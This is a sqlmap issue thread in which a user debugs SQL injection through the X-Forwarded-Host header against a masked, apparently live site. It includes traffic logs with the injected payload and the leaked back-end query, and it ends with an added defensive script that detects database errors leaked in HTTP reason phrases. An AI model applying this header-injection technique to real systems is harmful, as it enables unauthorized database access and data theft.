Specific location error #2536
sqlmap already does it. Two things. 1) Always use valid values when you are doing SQLi (e.g. in your case you could use: Please run some proxy in between (e.g. Burp) and inspect requests and responses to find out what is going on.
As I can see you have something that is totally non conformant to web standards. Error is returned right after the error code (
Yes it's absolutely not standard! But is it possible to write a tamper for this case?
Correction. Maybe it is not so non-conformant as I first thought. Looking into ways how to support it. |
@lordo can you please update and retry?
With this command line
```
[22:45:16] [INFO] parsing HTTP request from 'inv.txt'
Parameter: X-Forwarded-Host #1* ((custom) HEADER)
[22:45:26] [INFO] the back-end DBMS is MySQL
[*] shutting down at 22:45:26
```
But it does not retrieve columns!
```
[*] starting at 22:52:02
[22:52:02] [INFO] parsing HTTP request from 'inv.txt'
[22:52:04] [DEBUG] declared web page charset 'utf-8'
Parameter: X-Forwarded-Host #1* ((custom) HEADER)
[22:52:04] [INFO] testing MySQL
```
@lordo I believe that you are limited to certain queries because of header injection. Please use
The data is retrieved perfectly! But with columns there is a situation I don't understand. Nothing happens at all; sqlmap doesn't even try to get a column and immediately writes that it is not possible. Command line:
The log file contains 1 query in which the vulnerable header (X-Forwarded-Host) is empty! That is, sqlmap did not set anything up, but said that it could not retrieve the columns.
LogFile:
```
HTTP response [#1] (200 OK):
#HTML SITE#
```
Can you please send a traffic file to
The mysql error is in the header name.
Can I make changes so that the header values are handled by sqlmap as well as the page?
LOG:
```
[16:15:58] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'X-Forwarded-Host #1*' might not be injectable
[16:15:58] [PAYLOAD] 'gSjgHl<'">GunUja
[16:15:58] [TRAFFIC OUT] HTTP request [#5]:
GET / HTTP/1.1
Accept: */*
Host: site.com:443
Accept-encoding: gzip,deflate
X-forwarded-host: 'gSjgHl<'">GunUja
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Cookie: 5fd55f8c1289a9f2dd7accf74deb8350=b0e2dea0463595a6877feedb63e6a341
Connection: close
[16:15:58] [TRAFFIC IN] HTTP response [#5] (500 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl<'">' at line 2 SQL=select user_id,type
from #__domains where domain_name='http://'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl<'">gunuja' or domain_name=''gsjghl<'">gunuja' or domain_name='www.'gsjghl<'">gunuja' or domain_name='http://'gsjghl<'">
;gunuja/' or domain_name='http://www.'gsjghl<'">gunuja/' or domain_name=''gsjghl<'">gunuja/' or domain_name='www.'gsjghl<'">gunuja/' ;):
Content-length: 185
X-powered-by: PHP/5.4.45-0+deb7u3
Content-encoding: gzip
Vary: Accept-Encoding
Uri: https://site.com:443/
Server: nginx/1.10.1
Connection: close
Pragma: no-cache
Cache-control: no-cache
Date: Tue, 16 May 2017 16:21:46 GMT
P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html
[16:15:58] [DEBUG] got HTTP error code: 500 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl<'">' at line 2 SQL=select user_id,type
from #__domains where domain_name='http://'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl<'">gunuja' or domain_name=''gsjghl<'">gunuja' or domain_name='www.'gsjghl<'">gunuja' or domain_name='http://'gsjghl<'">
;gunuja/' or domain_name='http://www.'gsjghl<'">gunuja/' or domain_name=''gsjghl<'">gunuja/' or domain_name='www.'gsjghl<'">gunuja/' ;)
```
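The log above shows why this case is awkward: the MySQL error text is not in the response body but in the reason phrase of the HTTP status line (`500 You have an error in your SQL syntax ...`), so any check that only inspects the body sees nothing. The following is an added example, not sqlmap's own code, of a small triage script a defender might run over captured proxy traffic to flag responses that leak verbose database errors in the status line, a header or the body. The sample responses are constructed to mirror the shape of the traffic in this issue (hostnames and error fragments are placeholders), and the fingerprint list is a deliberately small subset of the patterns a real tool would carry.

```python
import re

# Constructed sample responses, modelled on the traffic in this issue.
# They are not copies of the real traffic; values are placeholders.
SAMPLE_RESPONSES = {
    # The case from the log: the DBMS error sits in the status line's reason phrase.
    "error_in_status_line": (
        "HTTP/1.1 500 You have an error in your SQL syntax; check the manual that "
        "corresponds to your MySQL server version for the right syntax to use near "
        "'x' at line 2\r\n"
        "Content-Type: text/html\r\n"
        "Server: nginx\r\n"
        "\r\n"
        "<html><body>Internal error</body></html>"
    ),
    # The usual case: the error is printed into the page body.
    "error_in_body": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
        "<html><body>Warning: mysql_fetch_array(): supplied argument is not a valid "
        "MySQL result resource</body></html>"
    ),
    # A response with no leak at all.
    "clean": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
        "<html><body>Welcome</body></html>"
    ),
}

# A small subset of MySQL error fingerprints (real tools keep a much longer list).
MYSQL_ERROR_PATTERNS = [
    re.compile(r"You have an error in your SQL syntax", re.I),
    re.compile(r"supplied argument is not a valid MySQL result", re.I),
    re.compile(r"check the manual that corresponds to your (MySQL|MariaDB) server version", re.I),
]


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status_code, reason, headers, body).

    Only the first two tokens of the status line are structural; everything after
    the status code up to the end of the line is the reason phrase, which is
    exactly where the error in the issue's log was carried.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    code = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    reason = parts[2] if len(parts) > 2 else ""
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return code, reason, headers, body


def find_sql_error_leaks(raw, scan_status_line=True, scan_headers=True, scan_body=True):
    """Return a list of (location, pattern) for every DBMS error fingerprint found.

    location is 'status-line', 'header:<name>' or 'body'. Disabling
    scan_status_line and scan_headers reproduces a body-only check and shows
    how the status-line case goes unnoticed.
    """
    _, reason, headers, body = parse_response(raw)
    sections = []
    if scan_status_line:
        sections.append(("status-line", reason))
    if scan_headers:
        sections.extend(("header:" + name, value) for name, value in headers)
    if scan_body:
        sections.append(("body", body))
    hits = []
    for location, text in sections:
        for pattern in MYSQL_ERROR_PATTERNS:
            if pattern.search(text):
                hits.append((location, pattern.pattern))
    return hits


def triage(responses):
    """Map each response name to the distinct locations where errors leaked."""
    return {name: sorted({loc for loc, _ in find_sql_error_leaks(raw)})
            for name, raw in responses.items()}


if __name__ == "__main__":
    for name, locations in triage(SAMPLE_RESPONSES).items():
        print(f"{name}: {'no leak' if not locations else ', '.join(locations)}")
```

Running the block reports `error_in_status_line: status-line`, `error_in_body: body` and `clean: no leak`; calling `find_sql_error_leaks` with `scan_status_line=False, scan_headers=False` on the first sample returns an empty list, which is the blind spot the issue describes. The same scan is a cheap way to find applications that disclose raw SQL errors through unusual channels such as reason phrases, which is worth fixing on the server side regardless of whether any tool exploits it.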